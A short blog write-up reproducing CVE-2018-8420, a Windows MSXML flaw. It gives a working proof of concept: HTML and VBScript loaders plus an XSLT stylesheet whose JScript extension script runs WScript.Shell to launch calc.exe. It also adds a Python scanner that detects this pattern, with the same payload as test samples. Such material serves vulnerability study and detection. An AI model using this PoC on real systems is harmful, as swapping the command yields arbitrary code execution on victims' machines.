Reproducing CVE-2018-8420

0x01 Vulnerability description

I have been far too busy lately, so there is no way this write-up is going to be a proper one. This evening a Windows RCE vulnerability that hits every version came out, CVE-2018-8420. From a quick read of the description it should be caused by Microsoft.XMLDOM on Windows, and the PoC looks a bit like XXE.

0x02 Affected versions

  • Microsoft Windows 10 Version 1607 for 32-bit Systems
  • Microsoft Windows 10 Version 1607 for x64-based Systems
  • Microsoft Windows 10 Version 1803 for 32-bit Systems
  • Microsoft Windows 10 Version 1803 for x64-based Systems
  • Microsoft Windows 10 for 32-bit Systems
  • Microsoft Windows 10 for x64-based Systems
  • Microsoft Windows 10 version 1703 for 32-bit Systems
  • Microsoft Windows 10 version 1703 for x64-based Systems
  • Microsoft Windows 10 version 1709 for 32-bit Systems
  • Microsoft Windows 10 version 1709 for x64-based Systems
  • Microsoft Windows 7 for 32-bit Systems SP1
  • Microsoft Windows 7 for x64-based Systems SP1
  • Microsoft Windows 8.1 for 32-bit Systems
  • Microsoft Windows 8.1 for 64-bit Systems
  • Microsoft Windows RT 8.1
  • Microsoft Windows Server 1709
  • Microsoft Windows Server 1803
  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1
  • Microsoft Windows Server 2008 for 32-bit Systems SP2
  • Microsoft Windows Server 2008 for Itanium-based Systems SP2
  • Microsoft Windows Server 2008 for x64-based Systems SP2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016

So, by the looks of it, every version is affected.

0x03 Reproduction

PoC: https://github.com/Lz1y/CVE-2018-8420

//xml.html
<script type="text/vbscript">
Sub POC()
' Microsoft.XMLDOM is the version-independent ProgID of the MSXML DOM document
Set XML = CreateObject("Microsoft.XMLDOM")
XML.async = False
' The same document object is used as both the source and the stylesheet
Set xsl = XML
xsl.Load "xml.xml"
' transformNode applies the stylesheet, which runs the ms:script block in xml.xml
XML.transformNode xsl
End Sub
POC()
</script>
//xml.vbs
' Same chain as xml.html, but run from a standalone .vbs via the Windows Script Host
Sub Dummy()
Set XML = CreateObject("Microsoft.XMLDOM")
XML.async = False
Set xsl = XML
xsl.Load "xml.xml"
XML.transformNode xsl
End Sub
Dummy()
//xml.xml
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<!-- MSXML extension script (urn:schemas-microsoft-com:xslt); the JScript body runs during the transform -->
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]> </ms:script>
</stylesheet>

On Windows 7, opening xml.html in Internet Explorer triggers the vulnerability successfully.


On Windows 10, however, opening it in IE did not reproduce it. I suspect some change in the newer IE; if any expert knows the reason, could you explain it to me?


Through the VBS, though, it executes successfully.

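The scanner below is an added example written for this write-up, not code from the Lz1y repository or from Microsoft. It checks files for the two halves of the PoC chain shown above: an XSLT stylesheet carrying an extension script in the urn:schemas-microsoft-com:xslt namespace whose body instantiates an ActiveX or shell object, and a VBScript/JScript loader that creates an MSXML DOM (Microsoft.XMLDOM or an Msxml2.DOMDocument ProgID) and calls transformNode on it. The severity labels, function names and the sample inputs are my own; the samples are constructed here and mirror the PoC files.

```python
"""Detect the CVE-2018-8420 PoC pattern: msxsl extension scripts that reach the
host, and MSXML loaders that feed a stylesheet to transformNode.
Added example for this write-up; samples are constructed, not captured."""
import re
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"
MSXSL_NS = "urn:schemas-microsoft-com:xslt"
XSL_ROOTS = {"{%s}stylesheet" % XSL_NS, "{%s}transform" % XSL_NS}
MSXSL_SCRIPT = "{%s}script" % MSXSL_NS

# Tokens in an extension-script body that mean it leaves the transform and
# touches the host (ActiveX instantiation or a shell object).
SHELL_TOKENS = ("ActiveXObject", "CreateObject", "WScript.Shell", "Shell.Application")

# Loader side: MSXML DOM creation plus a transformNode/transformNodeToObject call.
DOM_CREATE = re.compile(
    r'(?:CreateObject|ActiveXObject)\s*\(\s*"(Microsoft\.XMLDOM|Msxml2\.DOMDocument(?:\.\d\.0)?)"\s*\)',
    re.IGNORECASE)
TRANSFORM_CALL = re.compile(r"\.transformNode(?:ToObject)?\b", re.IGNORECASE)


def scan_stylesheet(text):
    """Return (severity, message) findings for an XML document.
    high   : msxsl:script whose body contains a shell/ActiveX token
    medium : msxsl:script present, no known shell token
    Non-XSLT XML and unparseable input produce no finding from this check."""
    try:
        root = ET.fromstring(text.strip())
    except ET.ParseError:
        return []
    if root.tag not in XSL_ROOTS:
        return []
    findings = []
    for script in root.iter(MSXSL_SCRIPT):
        body = "".join(script.itertext())  # CDATA comes back as plain text
        hits = [t for t in SHELL_TOKENS if t in body]
        where = "msxsl:script language=%s prefix=%s" % (
            script.get("language"), script.get("implements-prefix"))
        if hits:
            findings.append(("high", "%s instantiates host object via %s" % (where, ", ".join(hits))))
        else:
            findings.append(("medium", "%s (extension script, no shell token)" % where))
    return findings


def scan_loader(text):
    """Flag script text that builds an MSXML DOM and runs transformNode on it."""
    created = DOM_CREATE.search(text)
    transformed = TRANSFORM_CALL.search(text)
    if created and transformed:
        return [("high", "%s created and %s called: XSLT script execution path" % (
            created.group(1), transformed.group(0).lstrip(".")))]
    return []


def scan(text):
    """Run both checks; a file is either a stylesheet or a loader, so the union is safe."""
    return scan_stylesheet(text) + scan_loader(text)


# --- Constructed samples mirroring the PoC files -------------------------
POC_XSL = """<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform"
            xmlns:ms="urn:schemas-microsoft-com:xslt"
            xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]></ms:script>
</stylesheet>"""

POC_VBS = """Sub Dummy()
Set XML = CreateObject("Microsoft.XMLDOM")
XML.async = False
Set xsl = XML
xsl.Load "xml.xml"
XML.transformNode xsl
End Sub
Dummy()"""

# Ordinary stylesheet without an extension script: must stay clean.
BENIGN_XSL = """<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match="/"><xsl:value-of select="name(/*)"/></xsl:template>
</xsl:stylesheet>"""

# Extension script that stays inside the transform: medium, not high.
PURE_MSXSL = """<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                xmlns:ms="urn:schemas-microsoft-com:xslt"
                xmlns:user="urn:example" version="1.0">
<ms:script implements-prefix="user" language="JScript"><![CDATA[
function twice(n) { return n * 2; }
]]></ms:script>
<xsl:template match="/"><xsl:value-of select="user:twice(21)"/></xsl:template>
</xsl:stylesheet>"""

if __name__ == "__main__":
    for name, sample in (("xml.xml", POC_XSL), ("xml.vbs", POC_VBS),
                         ("benign.xsl", BENIGN_XSL), ("pure.xsl", PURE_MSXSL)):
        print(name, scan(sample) or "clean")
```

The loader-side regexes are deliberately loose (case-insensitive, any MSXML ProgID) and will also match legitimate administrative scripts that transform XML, so pair a loader hit with a "high" stylesheet finding before raising an alert. A "medium" on a stylesheet only says that an extension script is present, which is a supported MSXML feature; it is the host-object instantiation inside that script that matches the PoC.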

0x04 Summary

I feel the exploitation method and the scope of this vulnerability are debatable; popping a calc window feels rather underwhelming. Maybe I have done too little pentesting and have not grasped the essence of it, but to me this looks like a pretty weak vulnerability.

Reference

倾旋's WeChat Moments post